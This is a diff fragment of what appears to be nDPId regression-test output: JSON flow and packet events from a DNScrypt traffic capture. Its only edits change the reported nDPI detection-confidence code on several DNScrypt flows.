@@ -296,28 +296,28 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":946739305326,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739305326,"pkt":"ZmZmZmZmRERERERECABFAADWg1AAADQR55aOBMxvCgAAAQG7gS8AwlgaAg6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAIcwI1AAL0RNQwKAAABlXBwCsNzIPsCCMhQbAABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAXcwI4gAL0RUUsKAAABlXBwCpxJIPsGBPr0a\/0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":146,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305327} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":146,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAABQwI4Aub0Rdh4KAAABlXBwCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAXcwI8gAL0RUUoKAAABlXBwCtrWIPsGBLxpa\/sBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":148,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305327} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":148,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAABQwI8Aub0Rdh0KAAABlXBwCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAXcwJEgAL0RUUgKAAABlXBwCqZKIPsGBPDxa\/8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAIcwJBAAL0RNQkKAAABlXBwCuB5IPsCCMhQa\/4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 